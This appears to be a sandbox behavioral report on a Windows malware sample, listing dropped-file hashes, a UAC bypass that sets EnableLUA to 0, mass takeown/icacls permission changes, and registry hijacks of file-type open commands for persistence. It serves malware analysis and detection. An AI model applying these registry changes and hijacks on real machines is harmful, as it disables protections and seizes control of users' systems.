C:\Windows\System32\tzsync.exe

MD5 5b93692cd2f48807968b7be1acce095b
SHA1 66d438205261cce61d7bde3f029ff697e33071b9
SHA256 d2e09f66b3ccdb0584249d61f2b6806fe9b10a30998311f56ebf5df775ebfc31
SHA512 a9d3fd8d5f901b5c00130baab0d3bc99bd41ee2241d34a395cba00c1f1854972eeb406053a30fa6b74d56816f954ca241e96928029c737fc2edffeac4dac1168

C:\Windows\System32\tzsync.exe

MD5 723659186ab13cd1077170ae7cdb2750
SHA1 df6d8195cdf873a9e0ff644a5875446f24b310e7
SHA256 6abf71dca4d8dcb39783936b5471461564bb3c2bd85212bb6ed29aba7f93f046
SHA512 7baa0c0a93ba11b3c765cf8847cc7fd6ccf94b7d252cf307376dbb6615058ce444d8e6dad2e878a0025140e74035a1e27782f5df3da2d7d63a1cacbb7715b03e

C:\Windows\System32\tzsync.exe

MD5 15ef8fb25bc7248af9429a31b11ca47a
SHA1 b5d52f363c40244e27f94ed431be85f782c654f5
SHA256 03e78bef19c8166d92028fc5b3f6e202fb1006bbdb03afce022783a2b4658b4f
SHA512 4d7a1c3ff1d86059de25faa4a975d9e3424512637a7aead82c6f8cf607c6eac383ef44bfdf8c1c6c4a1b1e5633c9b5755ff30794a06250587f3c507eaf6efe4a

C:\Windows\System32\tzsync.exe

MD5 caff06665b414ffbec6cb1c17b0376e8
SHA1 ed00ecb925a3c78598f6880bbf8624d95abac792
SHA256 2fe3324d358a4fd8d9f324f8783c3291390edbdd1e651ecfe193ea86880b6dba
SHA512 91b0e7451e27c649daaa0b8d20c462446266cb64a1fe5b72b674458deef0cc703f5a39aeb9bacaf86b419e82075fc7189728b96da71b94616635994ac71e0d38

C:\Windows\System32\tzsync.exe

MD5 9b7cdd763326d50a7e953618b26855d0
SHA1 c8461889c94d549e1d8e24344e7a4da60d1329bc
SHA256 ad3af7dbdefa2f26f046bfd189bf901b84f5a01fe5d097d93beb2cf5504e8e4b
SHA512 81bdea7f5b5cfc7d666fa8ff5daccfb0388649374c834aba109ec79b713192b07f71012b73c1fcf1026e63405cff791a6cd3b57a4baa68ff2b18c662daaa6c74

C:\Windows\System32\tzsync.exe

MD5 e3e47df11088c6c8aeefe4068a223354
SHA1 3b373646383b2285c0f9231c266c8838f8bf0187
SHA256 f252ce980d3c2b54d85642c46acbff84840ec1ec4408c94dedba3d14ddfcc468
SHA512 857ed92c7be29c695f5234f082cde15b1e8c7b2dafabc24230fdc7bc38955d152b66457bec7b1d71d4745fc72bb4990c1182b8884d68d022bcb41873865317ee

C:\Windows\System32\tzsync.exe

MD5 5253dbbbf09b786168572ce8f816848e
SHA1 bd0ccdbc47c2a51f180f822fe3c45f32e3f5da99
SHA256 718015309d982539d1dff52bd0c579f7810095b3dbce7110b73170d21e37cc92
SHA512 305fb7e9f0e411c3f45527413c30c43f7367da1f151ece043df4c7a955610f9e631fc465e3818b153dc0a4204716326aa76383244e8d7ba3b117990d5c31a2a6

C:\Windows\System32\tzsync.exe

MD5 33b6f7e3802c499a666ec7aa1438e9de
SHA1 7736e7c82d1712ea91099303e1cd9a3557b34940
SHA256 9a829010c4edb27cf04060befbb2d09e2fb299b4233a401879801d05b364fd1b
SHA512 e5c64a36dadfe8398f27dfccabcadbda7f99607702fefdbd7b2f9ea4d5e809387e36621cc6579e02ca329e18d29fd88a4bec21ad04fa12a7c007f53a778c4bbc

C:\Windows\System32\tzsync.exe

MD5 e6549419e3106e4712fcbce8b9a77def
SHA1 b52cde158fd7e09d103585772e3607dc3de28d5d
SHA256 cad5e8f95a73908015800788aa38e38780bb8b231b19b6e475e488f64f4905b5
SHA512 3fb29f6c098b1264ecf81f715bc13f31cdc73efc62ebd134e7d831efe478a60dacc1c2a79176264b95807d3b85dfe99d66d00e8222756bc9485a63b4a64bbc89

C:\Windows\System32\tzsync.exe

MD5 b887f25e5ef5f19e3eaded20739ba5a6
SHA1 908253ef2b0e7c5e1a1bf4b69ffedaee04c45556
SHA256 27ff69ad95f381790c11bccfa14889bbdcf409ec2f1548d5192e152f40f065de
SHA512 db31878944fd416186ca8bbbec33a64a04007703d308213e84399c2662b34b1571b4c7ce55a0cab25fa776b6783bbcf6fb1a204eb6dc68234350163645cfc416

C:\Windows\System32\tzsync.exe

MD5 84b602f461bed41c12f237aabfca17e2
SHA1 dec2ad048a73ae97686a75538a17ffa5d045453c
SHA256 b1378a409965f5408a9ef3cf330ff1a60edd6af55457a0c577aeb6689bd2c297
SHA512 0650e273bc0b70b809c63f153becb0be5a3416fd68be59d7d0122df005147ee2406103fd663247f856c45e10563bf30474c0589795339b07f8611afc3571e9ff

C:\Windows\System32\tzsync.exe

MD5 1a75cca69eb8800696c4bfda46465458
SHA1 445ba9908fc072fda2a63acbe71b227231325983
SHA256 9acaf5ab49b812412f35618f2257e44b0779451afbb593fa7889773d052e4928
SHA512 c8e8d2f574c152978c72bd53b081001f14636a6779b47ad583f89ffaf9c3e60b432091b55c7c80f278adb01f086935d191d764927f86732b4e40d2753e75ba15

memory/2060-11530-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-02 23:56

Reported

2024-10-02 23:59

Platform

win10v2004-20240802-en

Max time kernel

150s

Max time network

95s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe"

Signatures

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\System32\reg.exe N/A

Disables Task Manager via registry modification

evasion

Possible privilege escalation attempt

exploit
Description Indicator Process Target
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\takeown.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A
N/A N/A C:\Windows\System32\icacls.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

File and Directory Permissions Modification: Windows File and Directory Permissions Modification

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\wowreg32.exe C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\batfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe BATCF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\giffile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe JPGIF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe HTMWF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\rtffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe RTFDF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inifile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe CMDSF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\VBSFile\Shell\Open\Command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe VBSSF %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\xmlfile\shell\Open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\inffile\shell\open\command\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe NTPAD %1" C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\System32\reg.exe N/A
N/A N/A C:\Windows\System32\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\takeown.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4432 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 4432 wrote to memory of 1300 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 4432 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 4432 wrote to memory of 920 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\reg.exe
PID 4432 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 4192 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 1184 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2396 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 900 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 4824 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 2272 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 5024 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3200 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3564 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3636 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
PID 4432 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3104 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\icacls.exe
PID 4432 wrote to memory of 3076 N/A C:\Users\Admin\AppData\Local\Temp\2759e2d64c124380cc1bbaa512efa92771d613869db671179032221e2b0e878fN.exe C:\Windows\System32\takeown.exe
